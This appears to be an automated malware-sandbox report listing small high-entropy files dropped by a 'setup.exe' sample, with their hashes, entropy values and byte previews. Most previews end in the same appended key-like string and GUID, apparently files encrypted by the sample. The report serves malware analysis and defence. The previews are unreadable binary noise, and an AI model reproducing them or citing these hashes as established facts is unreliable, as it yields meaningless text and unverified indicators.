              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):741
              Entropy (8bit):7.733935557150579
              Encrypted:false
              SSDEEP:12:YDmxLVe1dDCA3gJhjXsMkuCIIbQ0EJobeo64M+203Fv6ultALfn9XJgm0gUSny8Z:YiE1sA3YjXsMk93QVobT64q03l6uTAL5
              MD5:F133D2586CBEE6D5013F29E113A39F58
              SHA1:4A0EF244F75C50A6F70526F1AC6F477601A25FF0
              SHA-256:9FDCAC3A0B4B7BD6E7BABF6890554EAD1AC6E099FC58FEA1B61415D26635F5B8
              SHA-512:C8153668B1CD527A4C726E46146F65CF2B359F85C00674043985BDC10FAB3211E17E478C20B179706D915AC506C2809D99D5C580F26C08320B0B4FB0A62DE7ED
              Malicious:false
              Preview:<?xmle.....nGn.L....&...d..q....U..!'^....l........s...:..#QP...k.Pb....S{...E...e...b...^..zU-...W...7.(.g_..O....9t..E...T...%.!.o.5.....'..9>.0.Nh..J..C@fKB.S^P.o..GY.17E....A..vi.PI....`........>..Y.].|.5t.8...b;.}........!.X...R..=@S...A.v*+...X..5...:Z.fp.>..\..nS0m}... .t....V.'..%.v...Z0p|....Q..t..9.....@.....R.e..4~..i.A.?...}.I.F.klj.w.....8S!.>....g.D.......Y...;.OX.\knW..._.)..WfY....._....$...6.<g..b-.U.Fk....<.j..e.![PL=.."J..^6.~...*m..7./.]xWd....b.+.:...n.I....Y.D.^...g.Z..p.q...-..k/......A..,Y|)..Be..`.2xY|..."..%L../ ..xM..#.3l.-'......@h.......t..........2.X.M.~.(...z..a..f.>.V.....,.BB....e..s....a'.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):802
              Entropy (8bit):7.705866369846681
              Encrypted:false
              SSDEEP:12:SzaNBDfqfgjmV3elEELgMeiKFuiJf0HAPETk/6g4MxkWu+aWEXK1mh+4+MXsMR2X:Sza76D3elEELgTFocEwSg4MxcBXK31bD
              MD5:21712D82FFAC41D772AAA15AA7DB0DC2
              SHA1:D8803B222532CD38A7882B58EE5440E3F6BCCA4D
              SHA-256:97294DFE5F65F857E2EF6ADDD0585D534CACB8732BEBFC3261379D2D5F9928D0
              SHA-512:27135B16091F97FF104C827E18BEFCB0F7088E66B9AB1D0710ADD9141EB9D9893217CFDEDDFAF8FEBFCDD1A26198B4466E74E7B384689A7B9C8429C9618C678B
              Malicious:false
              Preview:<?xml...1.\..6.8@.=of..A?W...e.}.d.....H.&...0.....s@..h....W......G...."Ad.._.d.....%....!="D_=.M.,..%K...<.{...........E.3]...ZQ...Y...dE....l..1f...!.vP\..@.. .QY..T.-..%..8;o..{.c...S.. ..V...7i)#.....v.X.?....u..g.....VD:o.l..?-..45.#.'.........8.....s........vQk.....>H.A....X...1.v.R.......i(....J~.. ~....D....4#...(...R.W.....p.S......W.=#8..>.#o..i.Z,G.....o.r.3+a.bO..p...E...1..giW.O..O%^.$..r.,..X.V..=N....U........Pe.6.U...E..A..,..?....?a\..v.y.......".|.......zk.!.....{..:..?p..n.....I....L.5y ..0K.N...|.....z....N.~..n.(.x.......}...[..1;T..o!Q.?..LkA.;.9.......N..h=.x..r.(.~..o?.a_.Hm...?D].)'.....A.i.%.V.#d.1u..\3'a|t=...Hd.@f.5.XT.._.3......DrA..u|...|..........u..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):749
              Entropy (8bit):7.742300100643557
              Encrypted:false
              SSDEEP:12:NqH9k3yoaUuE+oIq9FRyLCW3IASHedl60LYsbaCeMNHdTbYZQJK83ssMR2cii9a:wdsCoV9by2W3UYjbaMZWqE831bD
              MD5:5E4CAA7C43301370DF19EE8B2D9AC6E7
              SHA1:02DA077510C09719E29AD2EAFFB8B718018B1BBB
              SHA-256:E3A63FF9CD28C70793F5AD91504E11F544BAB688D89B02FF002A54569DBABF39
              SHA-512:A16349B4A6CA2B149140065C0EF8F278BD4820A27044729A237A68D2483E85BFF897AF110D95E0238BF2B5B2A075836402D9B030E5B7BBEF39FC9769D92E1756
              Malicious:false
              Preview:<?xml..3..6...'wn......$l]8y*u....$......O.9a;i.......^..0O.Z.....8....~G..KF...D..j{...M..o..1......G..,..Z..5....KXh.I|.p.....C..U.V.s..:.U......%..H9..MA?..T.....5.C.#G...R;..P...J....(]........P.O..V.....G...D.+....B.}.............\\.@.`....#}.....W.....u.<\I..Iy....2...'s.l..'g.\3..A.Q+........@.~.e)..../......|....:'[H...Y....OU.T......~.../....=.Q..z...K.1.:(x....y.E..c.Ta.).&..u...........D2N..S....a..Ifk.l.WDM....^r..W..!..X...<>].8}.~yA..!@..N.....q....@.'.}..c.].s...U...k...,...7.{.9.....{...U....~&.....h.=k.> .#~..v....F...t....~.;[7n/...".....G.....e]...0P0XA..g....;5...............;9.>%!.#..J.u.,.ZMm...e...)u.Z[.?....H9VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.701430550677424
              Encrypted:false
              SSDEEP:24:C0Do6P8Cwy5wCz6VOLCSXQ+44fqbm+//pHbD:CsP8C5wCz6c9XQPbF/dD
              MD5:0975AFA450DA8F8C53E081ADEF7CD1FB
              SHA1:7140B459ADA61FFAABCD249D46781EB1FCC6F085
              SHA-256:619B40B6F75A0D0A28581502E6C21B66329745BDFB78B9657900D7AF1B5B2DFF
              SHA-512:27E7FE4629C2089F08B278137F7D3E17AD74CCC4FC1EBC21C67713415FB522A4336D7A9739E0C29ACB03E7150D80EC2223DC1764C050795B3125B9DC219EA4A4
              Malicious:false
              Preview:<?xml..K.Q..5\.f..G4*.."J!.....S..`.6xj.J.\h.EzQ.aW8dg.L......Y...[y...=OvE.>Ab...F...Ha.E.?.x..5H{,JEAM.{...h.2.CBAV...[...Ov..O.._$......y..Xkk.F0u.lxg..@...vL5Q.#..L.o.9".j.. ....Y4c...-Z. %T..p...$..9Z../x.\.,.3..;.....:.U.i..pR..=.F...NR4S..Fh..............{y .=$1..1.c..t.n.l.Y..4....I\.:..mt|.#.z.L\z..=....x...7#K.-..X..Y.+.I....Q.i...O..k.$n..).jEhF.F....'+..#.[x.g?.......F2Z.:....r.+/A8....V..{*..Vw..B.AGFU.. g}r.....o..B7.;kq......L."L......O....(.=.......A.....02.)...o...;mQ.4./^I....]...+M)...]..%tD.....&Y/.(#.R.UeJH..O!.R2c....B*0f.....CW. .]..4=%*.-..V...cF.Mc...f.&...B....2.....c<......7*.9....U...X...7...k...z.p>6...........,q.....5@j.....y..........f..B.....8I..].F..].L.*VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):765
              Entropy (8bit):7.686526540583005
              Encrypted:false
              SSDEEP:12:mI8G8HEVM4KfnbfEaUPSo8E4ocJOxtoLhJSRhvdP8hjRKF+4SvkZ+ON10S3rJgoW:m4fLGbgPSzE7xG8hvNb+EEONh7qbD
              MD5:CEDF12F64F13E36574DD08023CBD6B91
              SHA1:C439970AC01B67AE143D4AEDC7CFB7833C5BFD3A
              SHA-256:D0A57EC8917DFBE2B6A8E133C61114B35FD43657FFBE6B515BAA58E3862195AC
              SHA-512:1E9B59FA4154E9CEE27C55B8A6063EB3A1D6448A6FBECFC95B39CFBBC28749BA881AABCEC5EF2C0BCB56FEF60D74F8432328C9A680403B5F27592E5175412065
              Malicious:false
              Preview:<?xml....Z..xzY..W....*jC....hr47.?.4.T|...(..X.^../.B......".\....z9.3...G.....#*....7..M..>.C...eD....R..g9.s....$....saK..n.K../...~g.Mz.}.:5l. .zV`..s....l><..s.._.~Y.B1m..p..+.W.S....{o.&3*....C..e!..Q.1..#F...-.._..:.V.....}?..1.......4MH.G...]..)1r.'2....e.n.U.....c..f .].;... .7.. .x5.>sq...o.........k..B.Z.n..Ijl@...I..oi.Zv....0'Jur.~..q.T..h .]...b.9..s..Id_^.Y..VwF.ysR.F|./......M$.q.D+f.a..w..>...E;.>`..%..6........l.|.....uA..]`.x#.v...P..{HL*]..+....K....h.d.=&.....W.`..^.B./..W.iK*...../.+..n&.H.......Z.R...}EG....vk.d}.....N...{G.."wCW.........|.[8.U.....h9....._.1..A.F..cV...c..;UI..`....;..)...........~...5.g."..<....GGt...r.qVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):7.736398106356405
              Encrypted:false
              SSDEEP:12:UdFUR9LucDqczFx/lJHNBQ3pTP/q1UpWLJRoBM69zRoz5sMR2cii9a:eUjLpqcBxntu35P/q1/YBlozmbD
              MD5:14FDACB856F4C469C70DB5213AC32BD6
              SHA1:D7EAEAC74D2360CA39E90D652529DA66C38EC17A
              SHA-256:D0BA54339A409D70F4E4EE9080573577B4336745B0F725F95ECCE4160166F1B0
              SHA-512:00F4ACBF8F905EFC467BEE8199D86ED0769F2D7726332778E5F8C13A5DEA5420FFC47F6A32B27A47341E64E458ACEAFFF25E6F8FD6B05C23905A99C43676736E
              Malicious:false
              Preview:<?xml)q........~[...P....H.....0..0.....{4a..s.[..fBmJ....Z[.U.@s.D9..wz...H..=!.h....*...^1E."?...;'m.1..H*K...P..n...G&..7.0C...$l.8aB.#...;..'.6..|...&..1....z..yE.......7.h...HB....X....."@..W..\....X.##... ..$B...>....:..p|.t.|.....|...P..+.f.....4.....).._Ci....:......\i ..{.....NJ.a%.@..v...7.~.K~..T..(..]2...a....'...^.7.u......6W.0..b..m.(&.%.`..N.d...l..(..L..5.O.47.../....cR....C2".7.IZ.).,..q..I.3...+C..omc.7..{5...Hh...-`..x.b...a.B.J.j.p.<HsP./.N.(y.n6.'O.. ,..k.{U.9....p......}W..~.C.\Y..s.8L1..K.{h......f.g.'..e....+...DL..h...N...+.8..F...5.T..)5...FO..;.P..w.......{....x...../..X5../....s.w.5.K.....".I Z.~W...)/@\.@......Gu.........h..v..bZ.4....4.^[1.R.r4../.....v[VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.744207196172876
              Encrypted:false
              SSDEEP:12:OjzWICWvw1+jqEuwyy1zO88pn0iz5C46EaEAjd0RUZFsWCAxzsMR2cii9a:+RIYjawyyhCn0inadd0RjWCDbD
              MD5:21295865E04CDF31ED15453E373DCD9A
              SHA1:42B0CAC7197E106E1A9EFF8B0A0E2B7D110F0DAB
              SHA-256:54B90AF9E4CE98F25CD624DF00E21BF502AAEB3736DBF31F4ED1C114234E51FE
              SHA-512:16AA5C63B1DF2BE29E413A5391C2B660F450BE533BC5C9FADCC13FFA8FEAEDCD5172633E39D9A43E7A830B6D9F8155811BE3CC2B69E3FA5F9F80B7B3DD29EF8A
              Malicious:false
              Preview:<?xml...AI3.[|......@..`MF.().......y....NW.......Y.M..M.j,.Q.K.,k.FP6.......q..Z./D..<..bw|4g...O.n:.~F..@q*.......)..{./.......M...R..J&B.....~.....a.<.....j .<MU=>.!...f...y.Nx...=...(v...V.....1.....)v.#X...d.[....iV...r1..^...X...2+.0[.a..'..6...a..t...f.:..r.e.AT.@._..{..#........R..}e>..N#W....kM.2...mM..@k(S..pg..]d.y....i.u...0.Ho..otvD....?...a2rk...Nhw.$."....8..#..k..c.....Fk.._....1..t,....._...99S..L.y.-.L,._.%G^...rQ.|.B.A...jn..3.48.L3.g....,7"..F.+.%"...e...t...ZB^.......ie..r......*..R.6...}7.U3(V.RS2......@..%3.H...}..^.xJZ....".k*..r.dM.>......-..p-.....g..te.u'.&.....!.U....V......DpkfTL!.q.;..c ..=...jO..R2.......`VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.7448644291874205
              Encrypted:false
              SSDEEP:12:vj5yB2pZKZ3jv3eMPJHwdr7KjkVBma9N2Y5y+oIuLigXlocjY5DJrN/635SCsMRw:roUo3jv7R6ZVBmlJmgLYZJp/4AbD
              MD5:BAE170F21BAE21DCFC25ABB55EB0601A
              SHA1:C5E111089AB8E50A1E01F1AEC38DB990020DDE3D
              SHA-256:C2E8B11BBC0C3E643D3FEFD093A7EA875A1945F682605AC4900550E77A3D2F71
              SHA-512:3D86A1DC82A6777A2F7263815E6C5A14DF6BCA83D51A4659E305974DC466C1FAF2BD93AFC4E46341778B4CE743FBE67FAA2BD1EC4910E2F704AE3FF55CDFD466
              Malicious:false
              Preview:<?xml..#..+.".....v..rj.. S.....`.....$..)..Rx.R......b<....Qz.P..g..ZO....5@mx...(0...C'...n...G.t..(..l......Tr.`..!|.. ..Gw%u.7.Q;^....r1.....+.2v..29....,....D`..@-....V#eE.tX kZ..d...9a1.{.FB..q ......J.8).(6...P.l..r.7...9.jw._....|.wt..8.P~F.....T..@..n.r....6\.*t.X....N..p.<..m$}..9..AT......L)..xo...B..,..ubI.+:...^....-..=.vD=.A..F..k..}.2.l..R...:#.vU..n'C.....k.....\........6.......2V....M....P6j.._....4#.:(.0.k........bN$.A.V....u.Jw.OF.V... .../.-......~W.S1CU.N9..........[(zP..M.I~.....v.....5..@YH...6...HDyg...G..{..?F.c|.6..R......+w..j2.........d.=.]"W&M.HZ.?._./.G ...s.Pl..}EV.3.r.>lSK.. .sY3.......Ja......1.!.)..7.._?.`...b.<.t..nr..m!...K..6.z....\6..2...IS,n.....gVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.6847421393293756
              Encrypted:false
              SSDEEP:12:nVCJqmPDWstaXTD911LYosPhPfm+H/0kBmcvmu/Nk7IJlyFPIQMzsMR2cii9a:VCpaX1L1cLVBHvt/OqWPqYbD
              MD5:13E16716FED49CDDC77E9201978A9314
              SHA1:B86AE54D5C7B6442775C3ED87E8B3BEAD44A9EAF
              SHA-256:C9E6B8F7978BBC7393578B1FACCB42869CF512B75639798D18B40F33B3AFBB8D
              SHA-512:720D48D0A38F10E6AF27DDE53FEB5F57D97348C8E249FCB21E8A06EB1EB3D137C3AA7C58BBDBC881BF6FBDE2947FAF9B9381C93AB8C5BC5D8C691E1490AD71B3
              Malicious:false
              Preview:<?xml...;~..(....w...C#.A..B..Z8..>.xH.X..0..../cL.{..!q._....A8.B.'.\>.. ?...c.D...h%eX..\..s.*...W.......Rv...Mn.....?......47..?...c.....#bm...%jW.y.AoU_2.VC.3^9`34..d~.k.j..~..2.+....O..G'......~....jW.)..'.{.C.R. ....V.4..r....n.B.G....+....p..>...v..rR...LI)X.O.hKm%0.....t.g....sb.E........j<.7.z..?...nN.Qh<..F%L......N....2...6.e...T..?......!*....\.......].....CAe...d..<.....c..8.......Hu\..W...G.Q.........Vc.U#Z...W....Q.......5........I........)...(o..2.....F*B.......B..~!...8#.\..&.}w75..........)."..-.09...R.....z..O...^T\...'..tKF...%.>W.....p...H_.q...ht.......vI..>!1.../.$...+q|..R......}....._.5.o......-..]......j..^VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.714256830563698
              Encrypted:false
              SSDEEP:12:g42xpE8W6ZA1jLHhg5Pw0GR9vBK1FSkJnKtkb/W+iVpmdcTkdQuqueR0XNzsMR2X:gvbWx1j+i/9vUFSCnKw/W+oIdUDDtbD
              MD5:BD8BE9CE032F49ECD52677A18B009DB6
              SHA1:62400D07E3687BF3AFFCDC55DADBF0B8A7649736
              SHA-256:6AFA3C704421542BA4F8EB23FEED7BF0054CEEDA59786D5BD06C2B1F71F81988
              SHA-512:A4E78B1E3D545A6791FCE67A413205F78EAC091BDCF019CC7BF46DE54DEF9FA69B5EA09C4414B56C8202EBA1BCCEEAAEBE442F268BB3BA4AEEAA1CAFA41395A0
              Malicious:false
              Preview:<?xml........* ..._.F..+0.x.-s..jZ`..:.i.+..fl.....l6...#ae]..iX...9.....y.o+,..7..#/n.,.W3l#&.M+...G..H...t.@.Z...j...d.^@.=h]c|=i.>...?.[.hn..1M.!..bT..q.......x.|../.p)*d(S&.D1....&..H.zG.wX`..w.......(..0.T....:.."<.........(...?.@.g-<.l...a.p......2..t.......\yN..]..Z.M......|.4SIn.+.n6.[..X..Kg.....qe...C.D....J-.y.t..g.I...Y.}..'........yqs..h./.[-"$48....p...] .>>.<.....C&5Vu1E..`.R...S._.1WE .6./.+.*.....o<..n. 21.....a...t....I......./[..v...!.a9..|.&Z.}RuP{.:..4.*..=..$f:k.?...~...[...&.6-.....RsYh.q...lKo.r8...w.C.s`.N.T}H....?...6T...k.e.k..l'3G...w .VP.\....i.t.Q........L.[CG....z."g..-@.u.("8.K.!.7../....{D.....Y..+d...S.5..d....<t.~U....&t,{~...&.{.....;!..)..f.C....c.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):738
              Entropy (8bit):7.657802614654217
              Encrypted:false
              SSDEEP:12:hmJ5thJIYcpN08jAP6iQJEzFazraCR5d/dzS88yiafdRgRIW/5xAsMR2cii9a:AtnP6NqzFaz2CRP/ZS88y7fdSuEbD
              MD5:4FF6403FB282ABB588B2CD2F1467903D
              SHA1:27516CC467EEF506C325AFBE4ECAFFDD193E82EB
              SHA-256:3C8FECF0E03977F679064F975E90C84F8DBF60E228F128395B39846E1CB80063
              SHA-512:1083BD2889AC65D5D84022BC59F00B725732F7AB419029C500435AA35EE1907596474FAE1F2F9ADFFBD212A0A4C603D54C79B8844518C967E1F6A3571EA5E3FD
              Malicious:false
              Preview:<?xml...cj..+.~.....w....D.L*...z....^3..6.)....02f)..#.\.Ie:..0.C.6.-.Nb.=L....cz...q.\G.3.[..t`.J.....=u`.....pDt...I...P-.?...Y.0.U.r8.X.X..<.+..e..eN..:.\.N3..J....W|+...t-..$C..0.*...0.o...6K......'9O..:.....w.H...}Q..`.*.g.+..4..6.0+...ueX{-k...4...c.....6...TV.P.H.{.Z...!X{..}Kb..{uS..k...#..!..M...5V.n..r{.*%=..b*....@.q.d..vi9..Zg..g..=.;....F.....O.r.p..W$...S..g8rQ.......l.O'..r....`...9.f&.Fc.>.b...16...'g/...}..}........d.B...0..N...!........k.....x1d|.be.YZk.3......~.Y.A.0.\U..:.'.d7.AW.....k<...^....R{qC..T.w"{V..[.\#.`:9.D.3..F:...'..^G{..?w...4H.p.*.2...m.....`...>S....mj..i%....u[....t.u..>Ae.%GZ..N'VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.723883380778225
              Encrypted:false
              SSDEEP:12:IUxKhqvik+e1NYOU5QQ7kAx3JiT1f3FPUd8T2e3/zutFThuy20q7NoUu89lGL1sV:IUxn+R/5jowi1vFMavPaOE8mLSbD
              MD5:0AC75F71EB3D5DECCB69D884093EABEF
              SHA1:FE3F50B15A324FE9BFA4E7382575176EC330E47E
              SHA-256:72C422B3F7F7BA2F453B8C7CADE34F1FA8E0FF53B61D9C21EF03571864E4E7EA
              SHA-512:D786EA0C4BCAEED9AF410182B16AEF84F2B5A2CD28D4E68D41C2692E6FF38D1AA822CF0D40028DF2BFF2E7904C0D49998C25E09F434554816D340EDA7B495DF2
              Malicious:false
              Preview:<?xmlu..]...I...m....A.F...C>...o.....`2..[....~.WC.....U..k..UE.;p..P'~.1.wc..I/...n..mO.... ...#...h...e...g..^/.<..i{..V4.Pqe.sMv3...v..;..+.,.....Pu.../.....dhs.....Y.D(...#.C.....Cp..^.(..CJ..I..Oh....9.5...d.....W.m..*.hdS...|c..QFj...c.k{..j.w....V}.A.J....Q .Rp.....V.4.K.<...>.O.<.<..,?_.......o...M......>.z.k..r...{.L.RE....sP.*B_..k.*Vkx..qR. H>.).....gfs.G.R....f.....)...=.[.....=..U:.......r...k..q...r.(f#HY.pw!7.B.........fU...].4M....t.3....R"B.11...T...9..,.J.::. ...`G].77tn)..Pu.Ga.Z....n.<BQtd...f.."i......f.u..$.....=j...C..u..Zk......O6..M@.M.......&.....U.........m........(.B.$...n..-...I.....CdGT~...4....<._...y...a..A..0!;...n..|.......7#.W;..[......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):507
              Entropy (8bit):7.577121384222018
              Encrypted:false
              SSDEEP:12:SzyI5jQkSl1OHjqB4IC18mNwHl4/asMR2cii9a:Szz54Cc4pWHe7bD
              MD5:A5B64D34C2F38882BEEF5797073955CE
              SHA1:6CD09187142734EBCC8ECDFD069EAA7224DF94B1
              SHA-256:59345BEC8C3EF9570354E7595E63D6C50C9B58EDAEDB39C84346703080F295F1
              SHA-512:E5E9452EF80B0187FC6C8B42C99BAC4898A8604629503BE6EB66D1A84033B89685C1A162E6B368DF704A68226D6B472BA2ABB7D98C67A9EF9D4A1D56D2DBF882
              Malicious:false
              Preview:<?xml.......O...AE..l.....N.[.[...R}....".Y;%....b.......3.@...}v...n...#9......l..I.i.V....?ng.....o...6.+...i,:.ZX..9g.G..L.y&.S..H......iE}.j~........p..a!8....=l..Z.[...k.x.F.z".u...d...9E..z...A..f..M....2_. q.s.....O.dmA..n)e....$.%..p.^..7.x@J......9.u..(".S,...1.L...A..d@....@.)\o.,".k.Lf.i.........)?...n]...]J...A..'.L.S7..YMW...y......b.@.....v...\...6..d.:=....NS$.s].......o7......Z..m..d..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2285
              Entropy (8bit):7.9146339655460745
              Encrypted:false
              SSDEEP:48:wjkfV1LhwoXLniSLrsbz8Ax1jQmu7hfmVsKAjxgRcLG6nw5DiCD:wU1LNTiSLmzLrjQmu7huVvc+4K3
              MD5:4F86F6573841EC60278DB01C06E823C2
              SHA1:55EC0E85C4301BA45A9C90E57539F9AF00A5A3F6
              SHA-256:56EF63790D02403679F895F3E1C41EA51FE9E97997BC66348E71332807259F84
              SHA-512:531D5D3E691C5C396ADE863A12E7FD9405A4CD948B875EAEF601B72C341977CECD8591DD61676EE96952C6014A3CCDC9BD7FEDD46EC0974BB467176BC727C86B
              Malicious:false
              Preview:<?xmlM.Au.K$....Rs!.9..)........&..$J!..A....3p.N.M...]M:.]].`IN......."........(..1.....ny.7w..^....`.c.VxE..'+...__d.{=.<_i.A...!.=K....m...{).`p...v.5. ....x..<QI<.LH...{.n.h......t8....(*....G.....@..".#...T..2.[...9..@......2..&...*syH.Nl...{Fi.Q.k%<.7&.."....i..3o6.<..u..QxY.r......>l.,.i....;.}4..3......:..W...1..*.e\..i..5.YN...I.b|.`.6...\iE.o4..6.w...kM.;N...55..X..[Q.u.7.n`...Y..*...xU./.S..m...%.c...7....B#....(*.r........M.....`).]~9....O@4......^../r....7.L.....V).0]...~#[(..x..Q.p...Mc..V...`.zt..9...s.^._a...g.....1iq..............W..........q..^..5...f#)H.S.....f.)..?...r..D.. .."W..C.....Ez.\%..%.[k...bL.@...g..pM......I......r2sF.6.?+.z..h.{1.c>.`b.s....."$".5..D...b&...S....o....j.Ti*d...5o...;..Mp3.g...PW..m)...^Z.......Z{...@.......L.U..G5..R.9..D..}.T..9.\._.'.#.p......*s.=..$[.Uk..a.s~..X[..).g.%.0.o.......nc/Ore[r.....Y...6... =.d83..J)...59.V..YeH;^`..aNI..6..O..y../..p.f..A.<.ty.t..U.."#+)...|&..A_..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1291
              Entropy (8bit):7.847361846662742
              Encrypted:false
              SSDEEP:24:G29eabLe+diyTJADwnu2t9itMLR/RoOMaKoIfI3ca1qb93poKbD:G2vbrcyTJCwDt9itKRp7MYIwcAqnrD
              MD5:2B4D9E2AC2B0C91186DD8D8EAF67BE32
              SHA1:EBDE267D497DA9AFA1293C193A6CBD1EBECF5ACD
              SHA-256:2808EE8EB95E9CBB6699F70485319AC936153441EEEA2BDCFFCD5B031B1D91B4
              SHA-512:F72E1C454A9540C1BB7FFCD5F4E35A5C6B4555D38FCA3250497EE2401C0F37EE3B9AE4DC09B00973B0A25C7EF0F22C254E34543E0CC70C41AB8790F0488FD65D
              Malicious:false
              Preview:<?xml.D...!..-....v.cf. h..%>...p.J. f....[.z..r%.h.b.G..N.3..#Y.|c.(....d.....+Jk.!J.g.$..gF...8.r.T.d:.C.}T.K..`f..j....J`;....O.....(*.8..-7...Q.,.Z"oB...,.).`.?I..\.`....V.K...K.i...%`m..xK..._!..,..K.c=.+Y...r..,..z..@(.......K..1#zP.(...@IISI..S..U......@~L...`I...xe......<..A....z........b#.._.`.....6........t......,,.....(..ZP.#...^K7[.....j1z.h. 3.2.cq._9...p.(d.l"Q";...G&.x2...p.^)..h...;.TYc.*...[.M..x.R..(e.Wa.XA.g`.......M9.Od%.JhC...K..X..3...D.:(.t.n.HkO...Z..`....n.....L.Wt4.....aq..w.......?9....E.JF....T.......u.4R.8b.....C..eq...s...M.z.*..Y..d. .Dn=....AQ.......&..`..i....Pv.........."@<...X.....>m..T.B.,......e.....a...D..=.....E4........#....&l.XN........|%..w..Z...w4u.`...j.....k...l.x....=...U...L...8.......9.0..m..w..F..i..2.5...A[[..i#l.].7.9;8....G..Vp.0.A............d.5.x....J.\....Fm....A.j.cf.dh....j......s!.a.W}z....Cy+..A.._r<..T...q/X.7`K..1 .0sh.H.Z....7.3;j........X..HL...?L....._.GF@9....^".w....P...1
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.757008541982683
              Encrypted:false
              SSDEEP:24:CBUvsPXOgKyqrAWLaiCRSX3P6kWfqF/8FD+umo6bD:wUvstw1P6qF/8Fvmo4D
              MD5:8B215BBD91D4205A0679E7D108A470DE
              SHA1:A8F473B1C084888271F875C1A15DBCA15C96258B
              SHA-256:9D1D44AA52C4A3A108C4BDDE3FABD0BD35E61B954E1F25DDF422FB3F12FFD18C
              SHA-512:A6C485B856486A42852B06A18E53E78A602DA6453CDDA0A0337D34CFE6F1B4F075F0AAC05B6A9CDCF2D92480323070DC7A9F08E0AF45ECBC0786F98E4E19B666
              Malicious:false
              Preview:<?xml.\s....B.$.y..T.g.....m.(3.Z^.p|f~2.(v.td..g$......?P.x.\.,....Lc...h...0..9..d.;9Y...=........S...w...2.-.1r)..a6Bn..&.6...pq=}vs..h.V...i..RC......d...N7[.....=._a....l+.>4..).....B.30.9.c....b..|$.|..M.......C.#I.n~.9.......vw.;.dX'...+ .B..w.m3.-.6...5....M.n....().J)+ZS{$~."}.F.......kL..s=...?...3....2.&...ha...SA..E.`@..Zj~...+.R..(ml.f..{..tX....].^..O.kwt...(..L.{..7....<.N.>p......t.....V.9........bl......v...U..-Ve..^.I..d.N....y...s.\w..j..W...D...;.T$..r. @...u.F....vp.{.]....gI].....Z...;.v2...c..1....).K.7.._U..,. ..t'...Z'/...w-..}N.A8.9.kC.I.....15.nU........hg.-.-.)'.Y,k-..:\.A..>...0A....l../.M..`.k....[.,.LM...3..gy.~.)...\...+.!%.../.P.T...g..DK.>n..[...".`..}.F..).p.b.....!.9/G3VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):630
              Entropy (8bit):7.621570214411718
              Encrypted:false
              SSDEEP:12:0BiRw4zmU4xbI23bxYnNtKn4t0qXDF4b3PIt1qOUXibPEVNzsMR2cii9a:0BiRVX4xBYNyY0Bb/9Xig3YbD
              MD5:EEF5B60F8C1F2383A3A141C9F24AA328
              SHA1:9C698DB0E831E67DC42437C685E27D5096D6220A
              SHA-256:9A6F20F6F1906CF6450D6663D8869C13F5C738C13FA4F91F322674556DAF2798
              SHA-512:D7A17E83F0AD42B3B70BED739DEECC0E0FD31445AE4E82A44344A35E3FE831DAFACAE52947E8E4611BD09509C98FD15D7A95704C98802987711F01000E5FAC9D
              Malicious:false
